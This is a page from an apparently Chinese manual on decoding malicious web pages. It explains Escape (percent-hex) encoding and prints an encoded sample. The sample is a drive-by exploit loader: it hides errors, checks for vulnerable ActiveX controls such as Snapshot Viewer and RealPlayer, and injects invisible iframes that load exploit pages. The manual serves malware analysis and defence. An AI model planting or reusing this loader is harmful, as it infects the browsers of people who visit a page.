网马解密参考手册
- 7 -
Escape 加密
其实就是分隔符为%的十六进制加密,一般使用 unescape 解密或是转换分隔符后用十六进制解密。
Sample
:
<script>
<html>
<body>
</body>
<script>window.onerror=function(){return true;}</script>
<script language="JavaScript">
eval(unescape("document.write%28%22%3Ciframe%20width%3D20%20height%3D0%20src%3Dflash.htm%3E
%3C/iframe%3E%22%29%3B%0D%0Adocument.write%28%22%3Ciframe%20width%3D100%20height%3D0%
20src%3Das.htm%3E%3C/iframe%3E%22%29%3B%0D%0Awindow.status%3D%22%u5B8C%u6210%22%3B
%0D%0Awindow.onerror%3Dfunction%28%29%7Breturn%20true%3B%7D%0D%0Aif%28navigator.userAgent.t
oLowerCase %28%29.indexOf%28%22msie%207%22%29%3D%3D-1%29%0D%0Adocument.write%28%22%3
Ciframe%20width%3D20%20height%3D0%20src%3D14.htm%3E%3C/iframe%3E%22%29%3B%0D%0Atry%7B
var%20f%3B%0D%0Avar%20gg%3Dnew%20ActiveXObject%28%22GLIEDown.IEDown.1%22%29%3B%7D%0
D%0Acatch%28f%29%7B%7D%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%0D%0Afinally%7Bif%28f%21%3D%22%5Bobject%20Error%5D%22%29%7Bdocument.
write%28%22%3Ciframe%20width%3D100%20height%3D0%20src%3Dlz.htm%3E%3C/iframe%3E%22%29%3
B%7D%7D%0D%0Atry%7Bvar%20m%3B%0D%0Avar%20hh%3Dnew%20ActiveXObject%28%22Downloader.D
Loader.1%22%29%3B%7D%0D%0Acatch%28m%29%7B%7D%3B%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%0D%0Afinally%7Bif%28m%21%3D%22%5Bobject%20E
rror%5D%22%29%7Bdocument.write%28%22%3Ciframe%20width%3D100%20height%3D0%20src%3Dsina.ht
m%3E%3C/iframe%3E%22%29%3B%7D%7D%0D%0Atry%7Bvar%20n%3B%0D%0Avar%20ll%3Dnew%20Acti
veXObject%28%22snpvw.Snapshot%20Viewer%20Control.1%22%29%3B%7D%0D%0Acatch%28n%29%7B%7
D%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%
0Afinally%7Bif%28n%21%3D%22%5Bobject%20Error%5D%22%29%7Bdocument.write%28%22%3Ciframe%20
width%3D100%20height%3D0%20src%3Doffice.htm%3E%3C/iframe%3E%22%29%3B%7D%7D%0D%0Atry%7
Bvar%20b%3B%0D%0Avar%20mm%3Dnew%20ActiveXObject%28%22NCTAudioFile2.AudioFile2.2%22%29%
3B%7D%0D%0Acatch%28b%29%7B%7D%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%0D%0Afinally%7Bif%28b%21%3D%22%5Bobject%20Error%5D%22%29%7
Bdocument.write%28%22%3Ciframe%20width%3D100%20height%3D0%20src%3DNCTAudioFile.htm%3E%3C/
iframe%3E%22%29%3B%7D%7D%0D%0Afunction%20test%28%29%0D%0A%7B%0D%0Arrooxx%20%3D%2
0%22IER%22%20+%20%22PCtl.I%22%20+%20%22ERP%22%20+%20%22Ctl.1%22%3B%0D%0Atry%0D%0
A%7B%0D%0ALike%20%3D%20new%20ActiveXObject%28rrooxx%29%3B%0D%0A%7Dcatch%28error%29%
7Breturn%3B%7D%0D%0Avvvvv%20%3D%20Like.PlayerProperty%28%22PRODUCTVERSION%22%29%3B%
0D%0Aif%28vvvvv%3C%3D%226.0.14.552%22%29%0D%0Adocument.write%28%22%3Ciframe%20width%3D
100%20height%3D0%20src%3Dre10.htm%3E%3C/iframe%3E%22%29%3B%0D%0Aelse%0D%0Adocument.w
rite%28%22%3Ciframe%20width%3D100%20height%3D0%20src%3Dre11.htm%3E%3C/iframe%3E%22%29%3
B%0D%0A%7D%0D%0Atest%28%29%3B"));
</script>